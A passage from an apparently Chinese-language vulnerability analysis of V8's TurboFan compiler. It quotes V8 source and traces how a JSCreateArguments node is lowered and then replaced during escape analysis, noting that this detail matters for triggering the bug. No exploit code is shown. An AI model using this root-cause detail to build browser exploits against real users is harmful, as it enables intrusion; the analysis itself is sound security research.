parameter1 =&gt; b，再往上追溯到 <code class="language-plaintext highlighter-rouge">b.d(a, b, 1)</code> 中的 b, 最终追溯到最外层函数的第二个参数 <code class="language-plaintext highlighter-rouge">b</code>, 所以图中是 Parameter[2]，代表是最外层函数的第二个参数。</p>

<p>还要注意下 102: FrameState 这个节点，它是 134:FrameState 的 outer_frame, 也就是 <code class="language-plaintext highlighter-rouge">b.a.call(arguments, b)</code> 这个调用处的 FrameState，可以看到 JSCreateArguments 节点也是 102 这个 FrameState 的局部变量，这个信息对触发漏洞也很重要。</p>

<p>这里再简单说一下 FrameState 节点的创建，最初的 FrameState 节点是在从字节码创建图 IR 时按需调用 <code class="language-plaintext highlighter-rouge">Checkpoint()</code> 创建的，每个 FrameState 节点都代表着当前位置的栈状态，存储着当前函数的参数，局部变量，this, context 等信息。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Node</span><span class="o">*</span> <span class="n">BytecodeGraphBuilder</span><span class="o">::</span><span class="n">Environment</span><span class="o">::</span><span class="n">Checkpoint</span><span class="p">(</span>
    <span class="n">BytecodeOffset</span> <span class="n">bailout_id</span><span class="p">,</span> <span class="n">OutputFrameStateCombine</span> <span class="n">combine</span><span class="p">,</span>
    <span class="k">const</span> <span class="n">BytecodeLivenessState</span><span class="o">*</span> <span class="n">liveness</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">parameter_count</span><span class="p">()</span> <span class="o">==</span> <span class="n">register_count</span><span class="p">())</span> <span class="p">{</span>
    <span class="c1">// Re-use the state-value cache if the number of local registers happens</span>
    <span class="c1">// to match the parameter count.</span>
    <span class="n">parameters_state_values_</span> <span class="o">=</span>
        <span class="n">GetStateValuesFromCache</span><span class="p">(</span><span class="o">&amp;</span><span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">at</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="n">parameter_count</span><span class="p">(),</span> <span class="nb">nullptr</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">UpdateStateValues</span><span class="p">(</span><span class="o">&amp;</span><span class="n">parameters_state_values_</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">at</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span>
                      <span class="n">parameter_count</span><span class="p">());</span>
  <span class="p">}</span>

  <span class="n">Node</span><span class="o">*</span> <span class="n">registers_state_values</span> <span class="o">=</span> <span class="n">GetStateValuesFromCache</span><span class="p">(</span>
      <span class="o">&amp;</span><span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">at</span><span class="p">(</span><span class="n">register_base</span><span class="p">()),</span> <span class="n">register_count</span><span class="p">(),</span> <span class="n">liveness</span><span class="p">);</span>

  <span class="kt">bool</span> <span class="n">accumulator_is_live</span> <span class="o">=</span> <span class="o">!</span><span class="n">liveness</span> <span class="o">||</span> <span class="n">liveness</span><span class="o">-&gt;</span><span class="n">AccumulatorIsLive</span><span class="p">();</span>
  <span class="n">Node</span><span class="o">*</span> <span class="n">accumulator_state_value</span> <span class="o">=</span>
      <span class="n">accumulator_is_live</span> <span class="o">&amp;&amp;</span> <span class="n">combine</span> <span class="o">!=</span> <span class="n">OutputFrameStateCombine</span><span class="o">::</span><span class="n">PokeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
          <span class="o">?</span> <span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">at</span><span class="p">(</span><span class="n">accumulator_base</span><span class="p">())</span>
          <span class="o">:</span> <span class="n">builder</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">jsgraph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">OptimizedOutConstant</span><span class="p">();</span>

  <span class="k">const</span> <span class="n">Operator</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="n">common</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">FrameState</span><span class="p">(</span>
      <span class="n">bailout_id</span><span class="p">,</span> <span class="n">combine</span><span class="p">,</span> <span class="n">builder</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">frame_state_function_info</span><span class="p">());</span>
  <span class="n">Node</span><span class="o">*</span> <span class="n">result</span> <span class="o">=</span> <span class="n">graph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">NewNode</span><span class="p">(</span>
      <span class="n">op</span><span class="p">,</span> <span class="n">parameters_state_values_</span><span class="p">,</span> <span class="n">registers_state_values</span><span class="p">,</span>
      <span class="n">accumulator_state_value</span><span class="p">,</span> <span class="n">Context</span><span class="p">(),</span> <span class="n">builder</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">GetFunctionClosure</span><span class="p">(),</span>
      <span class="n">builder</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">graph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">start</span><span class="p">());</span>

  <span class="k">return</span> <span class="n">result</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Issues:</span>
<span class="c1">// - Scopes - intimately tied to AST. Need to eval what is needed.</span>
<span class="c1">// - Need to resolve closure parameter treatment.</span>
<span class="n">BytecodeGraphBuilder</span><span class="o">::</span><span class="n">Environment</span><span class="o">::</span><span class="n">Environment</span><span class="p">(</span>
    <span class="n">BytecodeGraphBuilder</span><span class="o">*</span> <span class="n">builder</span><span class="p">,</span> <span class="kt">int</span> <span class="n">register_count</span><span class="p">,</span> <span class="kt">int</span> <span class="n">parameter_count</span><span class="p">,</span>
    <span class="n">interpreter</span><span class="o">::</span><span class="n">Register</span> <span class="n">incoming_new_target_or_generator</span><span class="p">,</span>
    <span class="n">Node</span><span class="o">*</span> <span class="n">control_dependency</span><span class="p">)</span>
    <span class="o">:</span> <span class="n">builder_</span><span class="p">(</span><span class="n">builder</span><span class="p">),</span>
      <span class="n">register_count_</span><span class="p">(</span><span class="n">register_count</span><span class="p">),</span>
      <span class="n">parameter_count_</span><span class="p">(</span><span class="n">parameter_count</span><span class="p">),</span>
      <span class="n">control_dependency_</span><span class="p">(</span><span class="n">control_dependency</span><span class="p">),</span>
      <span class="n">effect_dependency_</span><span class="p">(</span><span class="n">control_dependency</span><span class="p">),</span>
      <span class="n">values_</span><span class="p">(</span><span class="n">builder</span><span class="o">-&gt;</span><span class="n">local_zone</span><span class="p">()),</span>
      <span class="n">parameters_state_values_</span><span class="p">(</span><span class="nb">nullptr</span><span class="p">),</span>
      <span class="n">generator_state_</span><span class="p">(</span><span class="nb">nullptr</span><span class="p">)</span> <span class="p">{</span>
  <span class="c1">// The layout of values_ is:</span>
  <span class="c1">//</span>
  <span class="c1">// [receiver] [parameters] [registers] [accumulator]</span>
  <span class="c1">//</span>
  <span class="c1">// parameter[0] is the receiver (this), parameters 1..N are the</span>
  <span class="c1">// parameters supplied to the method (arg0..argN-1). The accumulator</span>
  <span class="c1">// is stored separately.</span>

  <span class="c1">// Parameters including the receiver</span>
  <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">parameter_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">debug_name</span> <span class="o">=</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="o">?</span> <span class="s">"%this"</span> <span class="o">:</span> <span class="nb">nullptr</span><span class="p">;</span>
    <span class="n">Node</span><span class="o">*</span> <span class="n">parameter</span> <span class="o">=</span> <span class="n">builder</span><span class="o">-&gt;</span><span class="n">GetParameter</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">debug_name</span><span class="p">);</span>
    <span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">push_back</span><span class="p">(</span><span class="n">parameter</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="c1">// Registers</span>
  <span class="n">register_base_</span> <span class="o">=</span> <span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span><span class="p">(</span><span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">());</span>
  <span class="n">Node</span><span class="o">*</span> <span class="n">undefined_constant</span> <span class="o">=</span> <span class="n">builder</span><span class="o">-&gt;</span><span class="n">jsgraph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">UndefinedConstant</span><span class="p">();</span>
  <span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">insert</span><span class="p">(</span><span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">end</span><span class="p">(),</span> <span class="n">register_count</span><span class="p">,</span> <span class="n">undefined_constant</span><span class="p">);</span>

  <span class="c1">// Accumulator</span>
  <span class="n">accumulator_base_</span> <span class="o">=</span> <span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span><span class="p">(</span><span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">());</span>
  <span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">push_back</span><span class="p">(</span><span class="n">undefined_constant</span><span class="p">);</span>

  <span class="c1">// Context</span>
  <span class="kt">int</span> <span class="n">context_index</span> <span class="o">=</span> <span class="n">Linkage</span><span class="o">::</span><span class="n">GetJSCallContextParamIndex</span><span class="p">(</span><span class="n">parameter_count</span><span class="p">);</span>
  <span class="n">context_</span> <span class="o">=</span> <span class="n">builder</span><span class="o">-&gt;</span><span class="n">GetParameter</span><span class="p">(</span><span class="n">context_index</span><span class="p">,</span> <span class="s">"%context"</span><span class="p">);</span>

  <span class="c1">// Incoming new.target or generator register</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">incoming_new_target_or_generator</span><span class="p">.</span><span class="n">is_valid</span><span class="p">())</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">new_target_index</span> <span class="o">=</span>
        <span class="n">Linkage</span><span class="o">::</span><span class="n">GetJSCallNewTargetParamIndex</span><span class="p">(</span><span class="n">parameter_count</span><span class="p">);</span>
    <span class="n">Node</span><span class="o">*</span> <span class="n">new_target_node</span> <span class="o">=</span>
        <span class="n">builder</span><span class="o">-&gt;</span><span class="n">GetParameter</span><span class="p">(</span><span class="n">new_target_index</span><span class="p">,</span> <span class="s">"%new.target"</span><span class="p">);</span>

    <span class="kt">int</span> <span class="n">values_index</span> <span class="o">=</span> <span class="n">RegisterToValuesIndex</span><span class="p">(</span><span class="n">incoming_new_target_or_generator</span><span class="p">);</span>
    <span class="n">values</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">at</span><span class="p">(</span><span class="n">values_index</span><span class="p">)</span> <span class="o">=</span> <span class="n">new_target_node</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="n">Node</span><span class="o">*</span> <span class="n">BytecodeGraphBuilder</span><span class="o">::</span><span class="n">GetParameter</span><span class="p">(</span><span class="kt">int</span> <span class="n">parameter_index</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">debug_name_hint</span><span class="p">)</span> <span class="p">{</span>
  <span class="c1">// We use negative indices for some parameters.</span>
  <span class="n">DCHECK_LE</span><span class="p">(</span><span class="n">ParameterInfo</span><span class="o">::</span><span class="n">kMinIndex</span><span class="p">,</span> <span class="n">parameter_index</span><span class="p">);</span>
  <span class="k">const</span> <span class="kt">size_t</span> <span class="n">index</span> <span class="o">=</span>
      <span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">size_t</span><span class="o">&gt;</span><span class="p">(</span><span class="n">parameter_index</span> <span class="o">-</span> <span class="n">ParameterInfo</span><span class="o">::</span><span class="n">kMinIndex</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">cached_parameters_</span><span class="p">.</span><span class="n">size</span><span class="p">()</span> <span class="o">&lt;=</span> <span class="n">index</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">cached_parameters_</span><span class="p">.</span><span class="n">resize</span><span class="p">(</span><span class="n">index</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="nb">nullptr</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">cached_parameters_</span><span class="p">[</span><span class="n">index</span><span class="p">]</span> <span class="o">==</span> <span class="nb">nullptr</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">cached_parameters_</span><span class="p">[</span><span class="n">index</span><span class="p">]</span> <span class="o">=</span>
        <span class="n">NewNode</span><span class="p">(</span><span class="n">common</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">Parameter</span><span class="p">(</span><span class="n">parameter_index</span><span class="p">,</span> <span class="n">debug_name_hint</span><span class="p">),</span>
                <span class="n">graph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">start</span><span class="p">());</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">cached_parameters_</span><span class="p">[</span><span class="n">index</span><span class="p">];</span>
<span class="p">}</span>
</code></pre></div></div>

<p>了解了这些来龙去脉，回头来仔细分析 JSCreateArguments 节点是怎么被优化掉的。</p>

<p>根据 turbolizer 显示的信息，JSCreateArguments 先是在 TypedLowering 阶段被优化成了实际的对象创建操作(以 FinishRegion 结尾的一系列节点组成)。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Reduction</span> <span class="n">JSCreateLowering</span><span class="o">::</span><span class="n">ReduceJSCreateArguments</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span> <span class="n">node</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">IrOpcode</span><span class="o">::</span><span class="n">kJSCreateArguments</span><span class="p">,</span> <span class="n">node</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">());</span>
  <span class="n">CreateArgumentsType</span> <span class="n">type</span> <span class="o">=</span> <span class="n">CreateArgumentsTypeOf</span><span class="p">(</span><span class="n">node</span><span class="o">-&gt;</span><span class="n">op</span><span class="p">());</span>
  <span class="n">FrameState</span> <span class="n">frame_state</span><span class="p">{</span><span class="n">NodeProperties</span><span class="o">::</span><span class="n">GetFrameStateInput</span><span class="p">(</span><span class="n">node</span><span class="p">)};</span>
  <span class="n">Node</span><span class="o">*</span> <span class="k">const</span> <span class="n">control</span> <span class="o">=</span> <span class="n">graph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">start</span><span class="p">();</span>
  <span class="n">FrameStateInfo</span> <span class="n">state_info</span> <span class="o">=</span> <span class="n">frame_state</span><span class="p">.</span><span class="n">frame_state_info</span><span class="p">();</span>
  <span class="n">SharedFunctionInfoRef</span> <span class="n">shared</span> <span class="o">=</span>
      <span class="n">MakeRef</span><span class="p">(</span><span class="n">broker</span><span class="p">(),</span> <span class="n">state_info</span><span class="p">.</span><span class="n">shared_info</span><span class="p">().</span><span class="n">ToHandleChecked</span><span class="p">());</span>

  <span class="c1">// Use the ArgumentsAccessStub for materializing both mapped and unmapped</span>
  <span class="c1">// arguments object, but only for non-inlined (i.e. outermost) frames.</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">frame_state</span><span class="p">.</span><span class="n">outer_frame_state</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">()</span> <span class="o">!=</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kFrameState</span><span class="p">)</span> <span class="p">{</span>
    <span class="p">...</span>
  <span class="p">}</span>
  <span class="c1">// Use inline allocation for all mapped arguments objects within inlined</span>
  <span class="c1">// (i.e. non-outermost) frames, independent of the object size.</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">frame_state</span><span class="p">.</span><span class="n">outer_frame_state</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">(),</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kFrameState</span><span class="p">);</span>
  <span class="k">switch</span> <span class="p">(</span><span class="n">type</span><span class="p">)</span> <span class="p">{</span>
	  <span class="p">...</span>
	 <span class="k">case</span> <span class="n">CreateArgumentsType</span><span class="o">::</span><span class="n">kUnmappedArguments</span><span class="p">:</span> <span class="p">{</span>
      <span class="c1">// Use inline allocation for all unmapped arguments objects within inlined</span>
      <span class="c1">// (i.e. non-outermost) frames, independent of the object size.</span>
      <span class="n">Node</span><span class="o">*</span> <span class="n">effect</span> <span class="o">=</span> <span class="n">NodeProperties</span><span class="o">::</span><span class="n">GetEffectInput</span><span class="p">(</span><span class="n">node</span><span class="p">);</span>
      <span class="c1">// Choose the correct frame state and frame state info depending on</span>
      <span class="c1">// whether there conceptually is an arguments adaptor frame in the call</span>
      <span class="c1">// chain.</span>
      <span class="n">FrameState</span> <span class="n">args_state</span> <span class="o">=</span> <span class="n">GetArgumentsFrameState</span><span class="p">(</span><span class="n">frame_state</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">args_state</span><span class="p">.</span><span class="n">parameters</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">()</span> <span class="o">==</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kDeadValue</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// This protects against an incompletely propagated DeadValue node.</span>
        <span class="c1">// If the FrameState has a DeadValue input, then this node will be</span>
        <span class="c1">// pruned anyway.</span>
        <span class="k">return</span> <span class="n">NoChange</span><span class="p">();</span>
      <span class="p">}</span>
      <span class="n">FrameStateInfo</span> <span class="n">args_state_info</span> <span class="o">=</span> <span class="n">args_state</span><span class="p">.</span><span class="n">frame_state_info</span><span class="p">();</span>
      <span class="kt">int</span> <span class="n">length</span> <span class="o">=</span> <span class="n">args_state_info</span><span class="p">.</span><span class="n">parameter_count</span><span class="p">()</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>  <span class="c1">// Minus receiver.</span>
      <span class="c1">// Prepare element backing store to be used by arguments object.</span>
      <span class="n">Node</span><span class="o">*</span> <span class="k">const</span> <span class="n">elements</span> <span class="o">=</span> <span class="n">TryAllocateArguments</span><span class="p">(</span><span class="n">effect</span><span class="p">,</span> <span class="n">control</span><span class="p">,</span> <span class="n">args_state</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">elements</span> <span class="o">==</span> <span class="nb">nullptr</span><span class="p">)</span> <span class="k">return</span> <span class="n">NoChange</span><span class="p">();</span>
      <span class="n">effect</span> <span class="o">=</span> <span class="n">elements</span><span class="o">-&gt;</span><span class="n">op</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">EffectOutputCount</span><span class="p">()</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">?</span> <span class="n">elements</span> <span class="o">:</span> <span class="n">effect</span><span class="p">;</span>
      <span class="c1">// Load the arguments object map.</span>
      <span class="n">Node</span><span class="o">*</span> <span class="k">const</span> <span class="n">arguments_map</span> <span class="o">=</span>
          <span class="n">jsgraph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">Constant</span><span class="p">(</span><span class="n">native_context</span><span class="p">().</span><span class="n">strict_arguments_map</span><span class="p">());</span>
      <span class="c1">// Actually allocate and initialize the arguments object.</span>
      <span class="n">AllocationBuilder</span> <span class="n">a</span><span class="p">(</span><span class="n">jsgraph</span><span class="p">(),</span> <span class="n">effect</span><span class="p">,</span> <span class="n">control</span><span class="p">);</span>
      <span class="n">STATIC_ASSERT</span><span class="p">(</span><span class="n">JSStrictArgumentsObject</span><span class="o">::</span><span class="n">kSize</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">*</span> <span class="n">kTaggedSize</span><span class="p">);</span>
      <span class="n">a</span><span class="p">.</span><span class="n">Allocate</span><span class="p">(</span><span class="n">JSStrictArgumentsObject</span><span class="o">::</span><span class="n">kSize</span><span class="p">);</span>
      <span class="n">a</span><span class="p">.</span><span class="n">Store</span><span class="p">(</span><span class="n">AccessBuilder</span><span class="o">::</span><span class="n">ForMap</span><span class="p">(),</span> <span class="n">arguments_map</span><span class="p">);</span>
      <span class="n">a</span><span class="p">.</span><span class="n">Store</span><span class="p">(</span><span class="n">AccessBuilder</span><span class="o">::</span><span class="n">ForJSObjectPropertiesOrHashKnownPointer</span><span class="p">(),</span>
              <span class="n">jsgraph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">EmptyFixedArrayConstant</span><span class="p">());</span>
      <span class="n">a</span><span class="p">.</span><span class="n">Store</span><span class="p">(</span><span class="n">AccessBuilder</span><span class="o">::</span><span class="n">ForJSObjectElements</span><span class="p">(),</span> <span class="n">elements</span><span class="p">);</span>
      <span class="n">a</span><span class="p">.</span><span class="n">Store</span><span class="p">(</span><span class="n">AccessBuilder</span><span class="o">::</span><span class="n">ForArgumentsLength</span><span class="p">(),</span> <span class="n">jsgraph</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">Constant</span><span class="p">(</span><span class="n">length</span><span class="p">));</span>
      <span class="n">RelaxControls</span><span class="p">(</span><span class="n">node</span><span class="p">);</span>
      <span class="n">a</span><span class="p">.</span><span class="n">FinishAndChange</span><span class="p">(</span><span class="n">node</span><span class="p">);</span>
      <span class="k">return</span> <span class="n">Changed</span><span class="p">(</span><span class="n">node</span><span class="p">);</span>
    <span class="p">}</span>
	<span class="p">...</span>
  <span class="p">}</span>
  <span class="n">UNREACHABLE</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<p>优化过后 JSCreateArguments 就被展开成了下面这些 Allocate 和 StoreField 节点。</p>

<p><img src="/assets/images/Pasted%20image%2020230816223925.png" alt="Pasted image 20230816223925.png" /></p>

<p><img src="/assets/images/Pasted%20image%2020230816224756.png" alt="Pasted image 20230816224756.png" /></p>

<p>之后这个状态一直保持到了逃逸分析 EscapeAnalysis 阶段，在逃逸分析阶段被优化成了下图的样子。</p>

<p><img src="/assets/images/Pasted%20image%2020230816232212.png" alt="Pasted image 20230816232212.png" /></p>

<p><a href="https://en.wikipedia.org/wiki/Escape_analysis">逃逸分析</a>是一种编译优化手段，简单来说如果编译器分析出一个对象只在某个范围内，例如一个函数内部，被创建并使用，那么就可以对它进行一些优化，例如本来应该在堆上分配的对象，如果只在函数内部使用就可以优化到栈上，这种情况可以称为被捕获。反过来如果编译器不能分析出对象只在特定范围内被使用，就可以说对象是逃逸的。推测是编译器分析出 arguments 对象只在函数内部使用，所以对它进行了一些优化。</p>

<p>下面来调试了一下逃逸分析，验证一下我的推测。调试发现 kFinishRegion 节点是在 <code class="language-plaintext highlighter-rouge">EscapeAnalysisReducer::ReduceDeoptState</code> 函数中被替换成 kObjectId 的，在处理 FrameState 以及其关联节点的过程中，发现 kFinishRegion 对应的对象是没有逃逸的，所以直接把 kFinishRegion 替换成了 ObjectState 和 kObjectId 节点。这里要注意 FrameState 节点处理流程中的 for 循环的遍历顺序，是先处理 kFrameStateOuterStateInput，之后才处理 kFrameStateParametersInput，所以 OuterFrameState 中的 kFinishRegion 节点被替换成了 ObjectState，而 kFrameStateParametersInput 中的 kFinishRegion 节点被替换成了 ObjectId。</p>

<pre><code class="language-CPP">Node* EscapeAnalysisReducer::ReduceDeoptState(Node* node, Node* effect,
                                              Deduplicator* deduplicator) {
  if (node-&gt;opcode() == IrOpcode::kFrameState) {
    NodeHashCache::Constructor new_node(&amp;node_cache_, node);
    // This input order is important to match the DFS traversal used in the
    // instruction selector. Otherwise, the instruction selector might find a
    // duplicate node before the original one.
    // 注意这里的遍历顺序, 是先从 kFrameStateOuterStateInput 开始, 所以
    for (int input_id : {FrameState::kFrameStateOuterStateInput,
                         FrameState::kFrameStateFunctionInput,
                         FrameState::kFrameStateParametersInput,
                         FrameState::kFrameStateContextInput,
                         FrameState::kFrameStateLocalsInput,
                         FrameState::kFrameStateStackInput}) {
      Node* input = node-&gt;InputAt(input_id);
      new_node.ReplaceInput(ReduceDeoptState(input, effect, deduplicator),
                            input_id);
    }
    return new_node.Get();
  } else if (node-&gt;opcode() == IrOpcode::kStateValues) {
    NodeHashCache::Constructor new_node(&amp;node_cache_, node);
    for (int i = 0; i &lt; node-&gt;op()-&gt;ValueInputCount(); ++i) {
      Node* input = NodeProperties::GetValueInput(node, i);
      new_node.ReplaceValueInput(ReduceDeoptState(input, effect, deduplicator),
                                 i);
    }
    return new_node.Get();
  } else if (const VirtualObject* vobject = analysis_result().GetVirtualObject(
                 SkipValueIdentities(node))) {
    if (vobject-&gt;HasEscaped()) return node;
    if (deduplicator-&gt;SeenBefore(vobject)) {
      return ObjectIdNode(vobject); //&lt;&lt;&lt;&lt;&lt; 这里
    } else {
      std::vector&lt;Node*&gt; inputs;
      for (int offset = 0; offset &lt; vobject-&gt;size(); offset += kTaggedSize) {
        Node* field =
            analysis_result().GetVirtualObjectField(vobject, offset, effect);
        CHECK_NOT_NULL(field);
        if (field != jsgraph()-&gt;Dead()) {
          inputs.push_back(ReduceDeoptState(field, effect, deduplicator));
        }
      }
      int num_inputs = static_cast&lt;int&gt;(inputs.size());
      NodeHashCache::Constructor new_node(
          &amp;node_cache_,
          jsgraph()-&gt;common()-&gt;ObjectState(vobject-&gt;id(), num_inputs),
          num_inputs, &amp;inputs.front(), NodeProperties::GetType(node));
      return new_node.Get();
    }
  } else {
    return node;
  }
}
</code></pre>

<p>上面这部分代码只负责节点的替换，而是节点的分析过程是在 <code class="language-plaintext highlighter-rouge">EscapeAnalysis::ReduceNode</code> 函数进行的：</p>
<ul>
  <li>kAllocate：创建一个虚拟对象来追踪的状态</li>
  <li>kFinishRegion： 把 ValueInput(0) 处 kAllocate 节点的虚拟对象传递下去.</li>
  <li>kStoreField：如果是赋值到被捕获的对象, 在虚拟对象里记录源操作数，省略本次写操作</li>
  <li>kLoadField：如果源操作数是被捕获的对象，直接从对应的虚拟对象里找到之前记录的值，省略本次读操作</li>
  <li>kFrameState, kStateValues: 被这两个节点使用不影响逃逸状态</li>
  <li>其他节点：标记输入节点为逃逸</li>
</ul>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">ReduceNode</span><span class="p">(</span><span class="k">const</span> <span class="n">Operator</span><span class="o">*</span> <span class="n">op</span><span class="p">,</span> <span class="n">EscapeAnalysisTracker</span><span class="o">::</span><span class="n">Scope</span><span class="o">*</span> <span class="n">current</span><span class="p">,</span>
                <span class="n">JSGraph</span><span class="o">*</span> <span class="n">jsgraph</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">switch</span> <span class="p">(</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">())</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kAllocate</span><span class="p">:</span> <span class="p">{</span>
      <span class="n">NumberMatcher</span> <span class="n">size</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">ValueInput</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
      <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">size</span><span class="p">.</span><span class="n">HasResolvedValue</span><span class="p">())</span> <span class="k">break</span><span class="p">;</span>
      <span class="kt">int</span> <span class="n">size_int</span> <span class="o">=</span> <span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span><span class="p">(</span><span class="n">size</span><span class="p">.</span><span class="n">ResolvedValue</span><span class="p">());</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">size_int</span> <span class="o">!=</span> <span class="n">size</span><span class="p">.</span><span class="n">ResolvedValue</span><span class="p">())</span> <span class="k">break</span><span class="p">;</span>
      <span class="k">if</span> <span class="p">(</span><span class="k">const</span> <span class="n">VirtualObject</span><span class="o">*</span> <span class="n">vobject</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">InitVirtualObject</span><span class="p">(</span><span class="n">size_int</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Initialize with dead nodes as a sentinel for uninitialized memory.</span>
        <span class="k">for</span> <span class="p">(</span><span class="n">Variable</span> <span class="n">field</span> <span class="o">:</span> <span class="o">*</span><span class="n">vobject</span><span class="p">)</span> <span class="p">{</span>
          <span class="n">current</span><span class="o">-&gt;</span><span class="n">Set</span><span class="p">(</span><span class="n">field</span><span class="p">,</span> <span class="n">jsgraph</span><span class="o">-&gt;</span><span class="n">Dead</span><span class="p">());</span>
        <span class="p">}</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kFinishRegion</span><span class="p">:</span>
      <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetVirtualObject</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">ValueInput</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kStoreField</span><span class="p">:</span> <span class="p">{</span>
      <span class="n">Node</span><span class="o">*</span> <span class="n">object</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">ValueInput</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
      <span class="n">Node</span><span class="o">*</span> <span class="n">value</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">ValueInput</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
